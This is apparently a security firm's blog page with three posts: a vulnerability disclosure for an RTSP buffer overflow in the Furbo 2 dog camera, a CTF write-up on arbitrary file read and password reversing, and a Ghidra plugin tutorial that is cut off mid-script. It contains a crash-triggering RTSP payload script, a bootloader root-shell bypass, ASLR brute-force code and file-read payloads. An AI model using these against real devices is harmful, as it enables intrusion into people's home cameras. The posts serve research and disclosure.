Hacking the Furbo Dog Camera: Part I

DSC_0773.JPG

The Furbo is a treat-tossing dog camera that began gaining traction on Indiegogo in 2016. Its rapid success on the crowdfunding platform led to a public release later that year. The Furbo is now widely available at Chewy and Amazon, where it has been a #1 best seller. The Furbo offers 24/7 camera access via its mobile application, streaming video and two-way audio. Other remote features include night vision, dog behavior monitoring, emergency detection, real-time notifications, and the ability to toss a treat to your dog. Given the device's vast feature set and popularity, Somerset Recon purchased several Furbos to research their security. This blog post documents a vulnerability discovered in the RTSP server running on the device. The research presented here pertains to the Furbo 2 model.

Once we got our hands on a couple of Furbos we began taking a look at the attack surface. The Furbo initially pairs with a mobile application on your phone via Bluetooth Low Energy (BLE), which allows the device to connect to your local WiFi network. With the Furbo on the network, a port scan revealed that ports 554 and 19531 were listening. Port 554 is used for RTSP, a network protocol commonly used for streaming video and audio. At first the RTSP service on the Furbo required no authentication, and we could remotely view the camera feed over RTSP using the VLC media player. However, after an update and a reset, the camera required authentication to access the RTSP streams.

The RTSP server on the Furbo uses HTTP digest authentication. This means that when connecting with an RTSP client, the client needs to authenticate by providing a username and password. The client utilizes a realm and nonce value sent by the server to generate an authentication header, which gets included in the request. With this in mind, we decided to try to identify a vulnerability in the RTSP service.
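For reference, the digest response that ends up in the Authorization header is the standard HTTP digest construction: an MD5 of the username, realm, and password, combined with the server's nonce and an MD5 of the method and URI. A minimal sketch of the computation (assuming no qop directive and placeholder credentials):

import hashlib

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(username, password, realm, nonce, method, uri):
    # HA1 = MD5(username:realm:password), HA2 = MD5(method:uri)
    ha1 = md5_hex("%s:%s:%s" % (username, realm, password))
    ha2 = md5_hex("%s:%s" % (method, uri))
    # response = MD5(HA1:nonce:HA2) when no qop is negotiated
    return md5_hex("%s:%s:%s" % (ha1, nonce, ha2))

# Placeholder credentials with the realm and a nonce observed from the Furbo
print(digest_response("user", "pass", "chicony.com", "40b5d14d3bb07ca3",
                      "DESCRIBE", "rtsp://192.168.1.85:554/stream"))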

Crash

The crash was discovered by manually fuzzing the RTSP service. A common tactic for discovering stack or heap overflows is sending large inputs, so we fired off some requests with large usernames and, much to our delight, saw the RTSP service reset. We eventually determined that a username of more than 132 characters crashed the RTSP service due to improper parsing of the authentication header. An example request can be seen below:

DESCRIBE rtsp://192.168.1.85:554/stream RTSP/1.0\r\n
CSeq: 7\r\n
Authorization: Digest username="AAAAAAAAAAAAAAAAAAAAAAA<+500>", realm="chicony.com", nonce="40b5d14d3bb07ca3", uri="rtsp://192.168.1.85:554/stream", response="981c9a2611617e5faf11be29407a4b8e"\r\n
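A crash like this can be reproduced with a short script that speaks just enough RTSP to deliver the malformed header. A minimal sketch, where the target IP, stream path, and response hash are placeholders:

import socket

TARGET = "192.168.1.85"   # placeholder Furbo IP on the local network
URI = "rtsp://%s:554/stream" % TARGET

# Oversized username intended to overflow the 132-byte value buffer
username = "A" * 500
request = (
    "DESCRIBE %s RTSP/1.0\r\n"
    "CSeq: 7\r\n"
    'Authorization: Digest username="%s", realm="chicony.com", '
    'nonce="40b5d14d3bb07ca3", uri="%s", response="00000000000000000000000000000000"\r\n'
    "\r\n"
) % (URI, username, URI)

s = socket.create_connection((TARGET, 554), timeout=5)
s.sendall(request.encode())
print(s.recv(4096))  # the service typically drops the connection and resets here
s.close()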

At this point we wanted to obtain shell access on the Furbo to triage the crash and develop an exploit. To do so we shifted gears and took a look at the hardware.

Reverse Engineering Hardware to Gain Root Access

An important and helpful first step in attacking the Furbo, and most IoT devices, is obtaining a root shell or some other internal access to the device. Doing so can help elucidate processes, data, or communication which are otherwise obfuscated or encrypted. We focused our efforts on gaining root access to the Furbo by directly attacking the hardware which contains several interconnected printed circuit boards (PCBs). There are three PCBs that we analyzed.

The back PCB contains the reset switch and USB Micro-B port, which can be used to power the Furbo as shown here:

DSC_0550.jpg

Note the non-populated chips and connectors. We traced these to see if any of them provided serial access, but they turned out to link to the USB controller’s D+ and D- lines. These connectors are probably used during manufacturing for flashing, but they did not give us the serial access we were searching for.

The central PCB acts as the hub connecting other PCBs as shown here:

DSC_0592_brighter.jpg

It contains relays, power regulators, an adjustment potentiometer, and a PIC16F57. Based on initial reverse engineering, this chip appears to control physical components such as the LED status bar, the treat shooter, and the mechanical switch that detects the treat shooter's motion.

The top PCB of the Furbo contains the large, visible-wavelength camera as shown here:

DSC_0577.jpg
DSC_0583.jpg

The board shown above supports Wi-Fi and Bluetooth, as evidenced by the connected patch antenna located on the side of the Furbo. The PCB also contains the main System on Chip (SoC) which performs the high level functions of the Furbo. The SoC is an Ambarella S2Lm.

The Ambarella SoC is the primary target: as a highly capable ARM Cortex-A9 SoC running Linux (compared to the fairly limited PIC16 and wireless chips), it likely performs all the important functions of the Furbo and hopefully exposes an accessible TTY shell (serial access). As with many new, complex, or custom SoCs, detailed datasheets and specifications for the Ambarella chips are difficult to find. Instead, we attached a logic analyzer to various test points until we located the UART TTY TX pin, running at a baud rate of 115200. From there we found the receive (RX) pin by connecting an FTDI adapter to adjacent pins until a key press was registered on the serial terminal. The resulting serial-access test points were located on the bottom left of the board as shown in the figure below:

DSC_0583_lines.png

We soldered some wires onto the test points circled above and had reliable serial access to the Ambarella SoC. The resulting boot log sequence can be seen here:

As we can see above, the boot sequence starts with the AMBoot bootloader, which is similar to Das U-Boot but custom built by Ambarella. It loads images from NAND flash and then boots the Linux 3.10.73 kernel. In the boot log, note the line indicating the parameters AMBoot uses to boot the Linux kernel:

[0.000000] Kernel command line: console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc video=amb0fb:720x480,720x480,1,0

The Linux terminal is protected by login credentials, but the boot process can be interrupted, causing the Furbo to drop into the AMBoot bootloader. See here for a similar demonstration of accessing a root shell from AMBoot. On the Furbo this can be done by pressing Enter at the TTY terminal immediately after reset, leading to the AMBoot terminal shown here:

amboot> boot console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh video=amb0fb:720x480,720x480,1,0

Utilizing the AMBoot “boot” command with init=/bin/sh, as shown above, bypasses the Linux login prompt and boots directly into a root shell. The result can be seen here:

Once a root shell is accessible, a persistent root user can be created by adding or modifying entries in /etc/passwd and /etc/shadow. This persistent root shell can then be accessed via the normal Linux login prompt.

Debugging & Reverse Engineering

Now that we had shell access to the device, we looked around and got an understanding of how the underlying services work. An executable named apps_launcher is used to launch multiple services, including the rtsp_svc (RTSP server). These processes are all monitored by a watchdog script and get restarted if one crashes. We found that manually starting the apps_launcher process revealed some promising information.

It was here that we noticed that the rtsp_svc service seemed to segfault twice before fully crashing. Note that the segfault addresses are set to 0x41414141, indicating a successful buffer overflow and the possibility of controlling program flow. To investigate further, we needed to start debugging and reversing the RTSP service crash.

From the information gathered so far, we were fairly confident we had discovered an exploitable condition. We added statically compiled dropbear-ssh and gdbserver binaries to the Furbo to aid in debugging and dove in. We connected to gdbserver on the Furbo from a remote machine using gdb-multiarch and GEF and immediately saw that we had a lot to work with:

500_As_gdb.png

Note the presence of the username's "A"s throughout, implying that the contents of the program counter ($pc), the stack ($sp), and registers $r4 through $r11 could be controlled. Using a cyclic pattern for the username revealed the offset at which each register could be controlled. For example, the offset of the program counter was found to be 164 characters.
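Pinpointing those offsets is easiest with a De Bruijn (cyclic) pattern. A minimal sketch using pwntools, where the crash value fed to cyclic_find() is a placeholder for whatever lands in $pc in the debugger:

from pwn import cyclic, cyclic_find

# Generate a non-repeating pattern to use as the username
pattern = cyclic(500)

# After the crash, look up the offset of the 4-byte value that landed in $pc
offset = cyclic_find(0x6161616a)
print("pc is overwritten at offset %d" % offset)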

The link register ($lr) indicates that the issue lies in the parse_authenticaton_header() function, which is located in libamprotocol-rtsp.so.1. We pulled this file off of the Furbo to take a look at what was happening. Many of the file and function names used by the RTSP service indicate that they are part of the Ambarella SDK. Below is a snippet of the vulnerable function decompiled with Ghidra.

... snippet start ...
  
  size_t sizeof_str;
  int int_result;
  size_t value_len;
  undefined4 strdupd_value;
  int req_len_;
  char *req_str_;
  char parameter [128];
  char value [132];
  char update_req_str;

... removed for brevity ...

      while( true ) {
        memset(parameter,0,0x80);
        memset(value,0,0x80);
        int_result = sscanf(req_str_,"%[^=]=\"%[^\"]\"",parameter); //ghidra missed value argument here
        if ((int_result != 2) &&
           (int_result = sscanf(req_str_,"%[^=]=\"\"",parameter), int_result != 1)) break;
        sizeof_str = strlen(parameter);
        if (sizeof_str == 8) {
          int_result = strcasecmp(parameter,"username");
          if (int_result == 0) {
            if (*(void **)(header + 0xc) != (void *)0x0) {
              operator.delete[](*(void **)(header + 0xc));
            }
            strdupd_value = amstrdup(value);
            *(undefined4 *)(header + 0xc) = strdupd_value;
            sizeof_str = strlen(parameter);
          }

... snippet end ...

Assuming we have sent a request with a username full of "A"s, by the time execution reaches the snippet shown, everything in the request up to the username parameter has been stripped off. Note that req_str_ in the highlighted section is a pointer to username="AAAAAAAAAA<+500>".

It’s worth mentioning that Ghidra appeared to misinterpret the arguments to sscanf() in this instance, as there should be two destination arguments listed: parameter and value. The first format specifier parses out the parameter name, such as username, and stores it in parameter. The second format specifier copies the actual parameter value, such as AAAAAAAAAAA, and stores it in value, which is only allocated 132 bytes. There is no length check, so the buffer overflows. When the function returns, the service crashes because the return address was overwritten with characters from the overflowed username in *req_str_.

Additional information was gathered to craft a working PoC. The camera uses address space layout randomization (ASLR), and the shared objects were compiled with no-execute (NX) protections. The rtsp_svc binary was not compiled as a position-independent executable (PIE); however, the executable's address range contains two leading null bytes (0x00008000), which unfortunately cannot be included in the payload. This makes it difficult to use return-oriented programming (ROP) gadgets from the text section to bypass ASLR, so we aimed to find another way.

Proof of Concept

As part of the triaging process, we disabled ASLR to see if we could craft a working exploit. With just 3 ROP gadgets from libc, we were able to gain code execution:

From here, we still wanted to find a way to exploit this with no prior access to the device (when ASLR is enabled). Ideally, we would have found some way to leak an address, but we did not find a way to accomplish that given the time invested.

As mentioned earlier, one of the behaviors we noticed was that the rtsp_svc executable would stay running after the first malformed payload and would not fully crash until the second. After the second request, the RTSP service would reset and come back up. We confirmed this is because rtsp_svc runs under a watchdog script.

Next, we checked the randomness of the libc base address each time the service started and found that 12 bits changed. The addresses looked something like 0x76CXX000, where XX varied and the C was occasionally a D. Taking all this into account, we crafted an exploit with two hardcoded libc base addresses that are tried over and over again until the exploit succeeds. With 12 bits changing between resets, each attempt has roughly a 1 in 4096 chance of working. So we patiently waited, as shown in the picture below:

bo_watin_for_shellz.JPG
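The retry logic itself is simple. A minimal sketch of the brute-force loop, where the two candidate libc base addresses and the send_payload() helper are placeholders for the real exploit code:

import time

# Hypothetical libc base guesses matching the 0x76CXX000 / 0x76DXX000 pattern
LIBC_GUESSES = [0x76C24000, 0x76D24000]

def send_payload(libc_base):
    """Placeholder: build the ROP chain against libc_base, fire the two
    malformed RTSP requests, and return True if a shell came back."""
    raise NotImplementedError

while True:
    for guess in LIBC_GUESSES:
        if send_payload(guess):
            print("shell obtained with libc base 0x%08x" % guess)
            raise SystemExit
    # the watchdog restarts rtsp_svc with a fresh ASLR slide; wait and retry
    time.sleep(5)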

In testing, it took anywhere from 2 minutes to 4 hours. Occasionally, the rtsp_svc executable would end up in a bad state requiring a full power cycle by unplugging the camera. This did not seem to happen at the time of initial discovery; however, multiple firmware updates have since been issued for the Furbo (none of which fixed the vulnerability), which may have something to do with that behavior. Below is a screenshot showing the exploit running against an out-of-the-box Furbo 2 and successfully gaining a shell:

aslr_shell.png

Finally, here is a video demonstrating the exploit in action side-by-side with a Furbo. To keep the video clear and concise, the demo below was executed with ASLR disabled.

We’ve made all the code available in our GitHub repository if you want to take a look or attempt to improve the reliability!

Disclosure

Given the impact of this vulnerability we reached out to the Furbo Security Team. Here is the timeline of events for this discovery.


Event - Date
Vulnerability discovered - 05/01/2020
Vulnerability PoC - 08/01/2020
Disclosed vulnerability to Furbo Security Team - 08/14/2020
Escalated to Ambarella (according to Furbo team) - 08/19/2020
Last communication received from Furbo Security Team - 08/20/2020
Applied for CVE - 08/21/2020
Checked in with Furbo for update (no response) - 08/28/2020
Assigned CVE-2020-24918 - 08/30/2020
Checked in with Furbo for update (no response) - 09/08/2020
Checked in with Furbo for update (no response) - 10/20/2020
Additional attempt to contact Furbo (no response) - 03/19/2021
Published blog post - 04/26/2021

As you can see, after we exchanged emails sharing the details of the vulnerability with the Furbo Security Team, communications soon dropped off. Multiple follow-up attempts went unanswered. The Furbo Security Team indicated that they had notified Ambarella of the vulnerability but never followed up with us. Our own attempts to contact Ambarella directly also went unanswered. At the time of posting, we are still trying to get in contact with Ambarella. This buffer overflow likely exists in the Ambarella SDK, which could potentially affect other products using Ambarella chipsets.

Conclusion

The Furbo 2 has a buffer overflow in the RTSP Service when parsing the RTSP authentication header. Upon successful exploitation, the attacker is able to execute code as root and take full control of the Furbo 2. There are many features that can be utilized from the command line including, but not limited to, recording audio and video, playing custom sounds, shooting out treats, and obtaining the RTSP password for live video streaming.

Since the discovery of this exploit the Furbo has had multiple firmware updates, but they do not appear to have patched the underlying RTSP vulnerability. The reliability of our exploit has decreased because the RTSP service on the test devices more frequently goes into a bad state requiring the device to be fully power cycled before continuing. Additionally, Tomofun has released the Furbo 2.5T. This new model has upgraded hardware and is running different firmware. While the buffer overflow vulnerability was not fixed in code, the new Furbo 2.5T model no longer restarts the RTSP service after a crash. This mitigation strategy prevents us from brute-forcing ASLR, and prevents our currently released exploit from running successfully against Furbo 2.5T devices.

After realizing how much the Furbo 2.5T changed, we decided to reassess the new devices. We found a host of new vulnerabilities that will be the focus of Hacking the Furbo Dog Camera: Part II!

Here’s a bonus video featuring Sonny the Golden Retriever!

Posted on April 26, 2021 .

LayerOne 2019 CTF - LogViewer

The LayerOne Capture The Flag (CTF) event is a traditional security competition hosted by the folks at Qualcomm at the LayerOne Security Conference. The challenges ranged in difficulty and required competitors to uncover flags by exploiting security vulnerabilities. This is a quick write-up of one of the more complex challenges (LogViewer):

Part I

The first part of the challenge asked competitors to calculate the SHA-256 hash of the web service binary running on the CTF server. The provided URL displayed the following page:

image7.png

The page was a simple form with an input field. Trying different inputs revealed that the form returned the contents of the file provided. As an example, we read the contents of /etc/passwd, as it is typically world-readable on a Linux system:

image14.png

The web service allowed an arbitrary read of a user defined file on the server. Theoretically we could use this vulnerability to download the web service binary itself, but there was a challenge with this approach: we did not know the correct path to the web service binary.

This was solved by looking through /proc. On typical Linux systems there are a few useful symlinks under /proc; notably /proc/self, which links to the /proc entry of the process that is reading it. So accessing /proc/self through the web service points to the web service process itself.

Note that every process running on a Linux system is represented by a directory under /proc (named after its PID). Each of these directories contains a standard set of files and links; notably, the exe symlink points to the program the process is currently running. The following details about exe are from the proc man page:

image1.png

Thus by accessing /proc/self/exe via the web form input we were able to download the web service binary directly:

image5.png

After saving the binary we calculated the SHA-256 hash of the file and captured the flag:

Flag: 04c0bd03d648ea2bee457cb86e952bd7d72bda35805b2e6576bafa2c1d270d90
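For reference, the whole Part I solution fits in a few lines. A minimal sketch, assuming the form submits the file path in a GET parameter named path (as seen in the Part II URL later in this post):

import hashlib
import requests

BASE_URL = "https://exeter.d53b608415a7222c.ctf.land"  # challenge server

# Ask the log viewer to read its own binary via the /proc/self/exe symlink
resp = requests.get(BASE_URL, params={"path": "/proc/self/exe"})

# The SHA-256 of the returned binary is the Part I flag
print(hashlib.sha256(resp.content).hexdigest())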

Part II

The second part of this challenge was to read the /flag.txt file on the CTF server by using the web service binary we obtained in Part I.

In order to begin reversing the web service binary, we pulled the HTML file from the challenge website and set up a local test environment. When we first ran the program on Ubuntu 18.04 and tried to read /flag.txt using the web form, it returned the following error:

image11.png

This error message told us that the program was expecting to read the file /etc/alpine-release and use it somehow. To verify this, we created a Docker container running Alpine Linux. After setting up the container, we got the following response when accessing the flag file:

A password was required (via GET parameters) to access the flag file and we had to figure out this password by reverse engineering the web service binary.

The binary was written in Go and statically linked, making it a bit messy to view in IDA Pro. After annotating and analyzing various functions, we reached the following conclusion regarding program flow:

The program first reads the form input and checks whether it contains /flag.txt. If it does, the program checks the password provided by the user and returns the flag's contents if the password is correct. Otherwise, it returns the contents of the user-specified file if it is present on the system.

Looking at the checkPassword functions, there were several cmp instructions that checked the total length and the byte values of the password. The following are the constraints for the password:

Constraint 1: The length of the password is at least 7 bytes (cmp rdx, 7)

image2.png

Constraint 2: The 4th and 6th bytes of the password must be equal (cmp [rax+06], cl)

image10.png

Constraint 3: The 1st byte of the password must be c (cmp BYTE PTR [rsp+0x3f], dl)

Constraint 4: The 3rd byte of the password must be e (cmp BYTE PTR [rsp+0x3f],cl)

Constraint 5: The 0th byte of the password must be Z (cmp BYTE PTR [rax], 0x5a)

Constraint 6: The 4th byte of the password must be x (cmp BYTE PTR [rax+4], 0x78)

Constraint 7: The 2nd byte of the password must be # (cmp BYTE PTR [rsp+0x3f], cl)

Constraint 8: The password’s 4th byte cannot be equal to the 5th byte plus 5 (cmp BYTE PTR [rsp+0x5],cl)

Constraint 9: The length of the password must be at least 9 bytes:

Constraint 10: The password’s third and fourth bytes have to be equal to the last two bytes:

To summarize all constraints:

  1. Must be at least 7 bytes

  2. Byte 4 and 6 must be equal

  3. Byte 1 must be c

  4. Byte 3 must be e

  5. Byte 0 must be Z

  6. Byte 4 must be x

  7. Byte 2 must be #

  8. Byte 4 must not be equal to byte 5 plus 5

  9. Must be at least 9 bytes

  10. Bytes 3 and 4 must be equal to the last two bytes

After many trials and errors, we came up with the following form of the password: 

Zc#exZx#e

Given that this will be passed as a GET parameter, it was important for us to URL-encode the "#" character, as it would otherwise be interpreted as a fragment identifier.
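A quick way to produce the encoded value is with Python's standard library (a small sketch):

from urllib.parse import quote

password = "Zc#exZx#e"
print(quote(password))  # Zc%23exZx%23e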

After generating the password we queried the CTF server with the following encoded payload:

https://exeter.d53b608415a7222c.ctf.land?path=/flag.txt&password=Zc%23exZx%23e

Accessing the URL above gave us the flag:

Flag: EngineeringFlagReversingReversed

And such is the story of the LogViewer challenge. We really enjoyed capturing this multifaceted flag, and we had a blast competing at the LayerOne CTF. Thanks again to the organizers of the conference and CTF. We are looking forward to the next one.

Posted on August 16, 2019 .

Ghidra Plugin Development for Vulnerability Research - Part-1

Overview

On March 5th at the RSA security conference, the National Security Agency (NSA) released a reverse engineering tool called Ghidra. Similar to IDA Pro, Ghidra is a disassembler and decompiler with many powerful features (e.g., plugin support, graph views, cross references, syntax highlighting, etc.). Although Ghidra's plugin capabilities are powerful, little information has been published on them. This blog post series will focus on Ghidra plugin development and how it can be used to help identify software vulnerabilities.

In our previous post, we leveraged IDA Pro’s plugin functionality to identify sinks (potentially vulnerable functions or programming syntax). We then improved upon this technique in our follow-up blog post to identify inlined strcpy calls and identified a buffer overflow in Microsoft Office. In this post, we will use similar techniques with Ghidra’s plugin feature to identify sinks in CoreFTPServer v1.2 build 505.

Ghidra Plugin Fundamentals

Before we begin, we recommend going through the example Ghidra plugin scripts and the front page of the API documentation (Help -> Ghidra API Help) to understand the basics of writing a plugin.

When a Ghidra plugin script runs, the current state of the program will be handled by the following five objects:

  • currentProgram: the active program

  • currentAddress: the address of the current cursor location in the tool

  • currentLocation: the program location of the current cursor location in the tool, or null if no program location exists

  • currentSelection: the current selection in the tool, or null if no selection exists

  • currentHighlight: the current highlight in the tool, or null if no highlight exists
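As a quick illustration, a script run from the Script Manager can reference these objects directly; a minimal sketch that simply prints a few of them:

# Minimal Ghidra Jython script: print some of the implicit state objects
print(currentProgram.getName())      # name of the active program
print(currentProgram.getLanguage())  # processor/language of the program
print(currentAddress)                # address under the cursor
print(currentSelection)              # None unless something is selected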

It is important to note that Ghidra is written in Java, and its plugins can be written in Java or Jython. For the purposes of this post, we will be writing a plugin in Jython. There are three ways to use Ghidra’s Jython API:

  • Using Python IDE (similar to IDA Python console):

  • Loading a script from the script manager:

  • Headless - Using Ghidra without a GUI:

ghidra_output4.png

With an understanding of Ghidra plugin basics, we can now dive deeper into the source code by utilizing the script manager (Right Click on the script -> Edit with Basic Editor)

The example plugin scripts are located under /path_to_ghidra/Ghidra/Features/Python/ghidra_scripts. (In the script manager, these are located under Examples/Python/):

ghidra_output6.png


Ghidra Plugin Sink Detection

In order to detect sinks, we first have to create a list of sinks that can be utilized by our plugin. For the purpose of this post, we will target the sinks that are known to produce buffer overflow vulnerabilities. These sinks can be found in various write-ups, books, and publications.

Our plugin will first identify all function calls in a program and check against our list of sinks to filter out the targets. For each sink, we will identify all of their parent functions and called addresses. By the end of this process, we will have a plugin that can map the calling functions to sinks, and therefore identify sinks that could result in a buffer overflow.

Locating Function Calls

There are various methods to determine whether a program contains sinks. We will be focusing on the below methods, and will discuss each in detail in the following sections:

  1. Linear Search - Iterate over the text section (executable section) of the binary and check the instruction operand against our predefined list of sinks.

  2. Cross References (Xrefs) - Utilize Ghidra’s built in identification of cross references and query the cross references to sinks.

Linear Search

The first method of locating all function calls in a program is to do a sequential search. While this method may not be the ideal search technique, it is a great way of demonstrating some of the features in Ghidra’s API.

Using the below code, we can print out all instructions in our program:

listing = currentProgram.getListing() #get a Listing interface
ins_list = listing.getInstructions(1) #get an Instruction iterator
while ins_list.hasNext():             #go through each instruction and print it out to the console
    ins = ins_list.next()
    print (ins)

Running the above script on CoreFTPServer gives us the following output:

ghidra_output7.png

We can see that all of the x86 instructions in the program were printed out to the console.


Next, we filter for sinks that are utilized in the program. It is important to check for duplicates as there could be multiple references to the identified sinks.

Building upon the previous code, we now have the following:

sinks = [ 
         "strcpy",
         "memcpy",
         "gets",
         "memmove",
         "scanf",
         "lstrcpy",
         "strcpyW",
         #...
         ]
duplicate = []
listing = currentProgram.getListing() 
ins_list = listing.getInstructions(1) 
while ins_list.hasNext():           
    ins = ins_list.next()    
    ops = ins.getOpObjects(0)    
    try:        
        target_addr = ops[0]  
        sink_func = listing.getFunctionAt(target_addr) 
        sink_func_name = sink_func.getName()         
        if sink_func_name in sinks and sink_func_name not in  duplicate:
            duplicate.append(sink_func_name) 
            print (sink_func_name,target_addr) 
    except:
        pass    


Now that we have identified a list of sinks in our target binary, we have to locate where these functions are getting called. Since we are iterating through the executable section of the binary and checking every operand against the list of sinks, all we have to do is add a filter for the call instruction.

Adding this check to the previous code gives us the following:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate through each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            target_addr = ops[0]
            sink_func = listing.getFunctionAt(target_addr)
            sink_func_name = sink_func.getName()
            #check to see if function being called is in the sinks list
            if sink_func_name in sinks and sink_func_name not in duplicate:
                duplicate.append(sink_func_name)
                print (sink_func_name,target_addr)
        except:
	        pass

Running the above script against CoreFTPServer v1.2 build 505 shows the results for all detected sinks:

ghidra_output8.png

Unfortunately, the above code does not detect any sinks in the CoreFTPServer binary. However, we know that this particular version of CoreFTPServer is vulnerable to a buffer overflow and contains the lstrcpyA sink. So, why did our plugin fail to detect any sinks?

After researching this question, we discovered that in order to identify the functions that are calling out to an external DLL, we need to use the function manager that specifically handles the external functions.

To do this, we modified our code so that every time we see a call instruction we go through all external functions in the program and check them against the list of sinks. Then, if a function is found in the list, we verify that the call's operand matches the address of the sink.

The following is the modified section of the script:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

program_sinks = {}
fm = currentProgram.getFunctionManager()
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)
ext_fm = fm.getExternalFunctions()

#iterate through each of the external functions to build a dictionary
#of external functions and their addresses
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
   
    #if the function is a sink then add it's address to a dictionary
    if target_func in sinks: 
        loc = ext_func.getExternalLocation()
        sink_addr = loc.getAddress()
        sink_func_name = loc.getLabel()
        program_sinks[sink_addr] = sink_func_name

#iterate through each instruction 
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            #get address of operand
            target_addr = ops[0]   
            #check to see if address exists in generated sink dictionary
            if program_sinks.get(target_addr):
                print (program_sinks[target_addr], target_addr,ins.getAddress()) 
        except:
            pass

Running the modified script against our program shows that we identified multiple sinks that could result in a buffer overflow.

ghidra_output9.png


Xrefs

The second approach is to identify cross references to each sink and check which of those cross references call the sinks in our list. Because this approach does not search through the entire text section, it is more efficient.

Using the below code, we can identify cross references to each sink:


sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
func = getFirstFunction()

while func is not None:
    func_name = func.getName()
    
    #check if function name is in sinks list
    if func_name in sinks and func_name not in duplicate:
        duplicate.append(func_name)
        entry_point = func.getEntryPoint()
        references = getReferencesTo(entry_point)
	#print cross-references    
        print(references)
    #set the function to the next function
    func = getFunctionAfter(func)

Now that we have identified the cross references, we can get an instruction for each reference and add a filter for the call instruction. A final modification is added to include the use of the external function manager:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
fm = currentProgram.getFunctionManager()
listing = currentProgram.getListing()
ext_fm = fm.getExternalFunctions()

#iterate through each external function
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
    
    #check if the function is in our sinks list 
    if target_func in sinks and target_func not in duplicate:
        duplicate.append(target_func)
        loc = ext_func.getExternalLocation()
        sink_func_addr = loc.getAddress()    
        
        if sink_func_addr is None:
            sink_func_addr = ext_func.getEntryPoint()

        if sink_func_addr is not None:
            references = getReferencesTo(sink_func_addr)

            #iterate through all cross references to potential sink
            for ref in references:
                call_addr = ref.getFromAddress()
                ins = listing.getInstructionAt(call_addr)
                mnemonic = ins.getMnemonicString()

                #print the sink and address of the sink if 
                #the instruction is a call instruction
                if mnemonic == "CALL":
                    print (target_func,sink_func_addr,call_addr)

Running the modified script against CoreFTPServer gives us a list of sinks that could result in a buffer overflow:

ghidra_output9.png



Mapping Calling Functions to Sinks

So far, our Ghidra plugin can identify sinks. With this information, we can take it a step further by mapping the calling functions to the sinks. This allows security researchers to visualize the relationship between the sink and its incoming data. For the purpose of this post, we will use the graphviz module to draw a graph.

Putting it all together gives us the following code:

from ghidra.program.model.address import Address
from ghidra.program.model.listing.CodeUnit import *
from ghidra.program.model.listing.Listing import *

import sys
import os

#get ghidra root directory
ghidra_default_dir = os.getcwd()

#get ghidra jython directory
jython_dir = os.path.join(ghidra_default_dir, "Ghidra", "Features", "Python", "lib", "Lib", "site-packages")

#insert jython directory into system path 
sys.path.insert(0,jython_dir)

from beautifultable import BeautifulTable
from graphviz import Digraph


sinks = [
    "strcpy",
    "memcpy",
    "gets",
    "memmove",
    "scanf",
    "strcpyA", 
    "strcpyW", 
    "wcscpy", 
    "_tcscpy", 
    "_mbscpy", 
    "StrCpy", 
    "StrCpyA", 
    "StrCpyW", 
    "lstrcpy", 
    "lstrcpyA", 
    "lstrcpyW", 
    #...
]

sink_dic = {}
duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate over each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    mnemonic = ins.getMnemonicString()
    ops = ins.getOpObjects(0)
    if mnemonic == "CALL":	
        try:
            target_addr = ops[0]
            func_name = None 
            
            if isinstance(target_addr,Address):
                code_unit = listing.getCodeUnitAt(target_addr)
                if code_unit is not None:
                    ref = code_unit.getExternalReference(0)	
                    if ref is not None:
                        func_name = ref.getLabel()
                    else:
                        func = listing.getFunctionAt(target_addr)
                        func_name = func.getName()

            #check if function name is in our sinks list
            if func_name in sinks and func_name not in duplicate:
                duplicate.append(func_name)
                references = getReferencesTo(target_addr)
                for ref in references:
                    call_addr = ref.getFromAddress()
                    sink_addr = ops[0]
                    parent_func_name = getFunctionBefore(call_addr).getName()

                    #check sink dictionary for parent function name
                    if sink_dic.get(parent_func_name):
                        if sink_dic[parent_func_name].get(func_name):
                            if call_addr not in sink_dic[parent_func_name][func_name]['call_address']:
                                sink_dic[parent_func_name][func_name]['call_address'].append(call_addr)
                        else:
                            sink_dic[parent_func_name][func_name] = {'call_address': [call_addr]}
                    else:
                        sink_dic[parent_func_name] = {func_name: {'call_address': [call_addr]}}
        except:
            pass

#instantiate graphviz
graph = Digraph("ReferenceTree")
graph.graph_attr['rankdir'] = 'LR'
duplicate = 0

#Add sinks and parent functions to a graph	
for parent_func_name,sink_func_list in sink_dic.items():
    #parent functions will be blue
    graph.node(parent_func_name,parent_func_name, style="filled",color="blue",fontcolor="white")
    for sink_name,sink_list in sink_func_list.items():
        #sinks will be colored red
        graph.node(sink_name,sink_name,style="filled", color="red",fontcolor="white")
        for call_addr in sink_list['call_address']:
            if duplicate != call_addr:
